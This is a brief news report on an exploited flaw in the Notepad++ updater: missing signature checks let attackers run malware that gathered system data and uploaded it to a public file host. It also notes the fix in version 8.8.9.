Vulnerability in Notepad++ updater exploited for malware

Vulnerability in Notepad++ updater exploited for malware

Briefly

"A security vulnerability in the Notepad++ update mechanism has been exploited to spread malicious code. What began as a report within the Notepad++ community at the end of October was later confirmed to be a structural weakness in the updater. Analysis by BleepingComputer shows that attackers were able to execute malware via this mechanism. Notepad++ has since released a fix in version 8.8.9."

"The first signs appeared on the official Notepad++ forum, where a user reported that during an automatic update, an unknown executable, %Temp%AutoUpdater.exe, was launched from the Notepad++ process and the updater gup.exe(WinGUp). This executable collected system information via standard Windows commands and stored the output in a file named a.txt. Further investigation revealed that this file was uploaded to temp.sh, a public file hosting service, using curl.exe."

"In early December, BleepingComputer provided more clarity. It turned out that WinGUp did not perform cryptographic verification on downloaded installers up to and including version 8.8.8. The updater did check for new versions, but did not validate whether the installation file was signed with the official code signing certificate. This allowed an attacker who managed to intercept or redirect the update traffic to execute a malicious executable."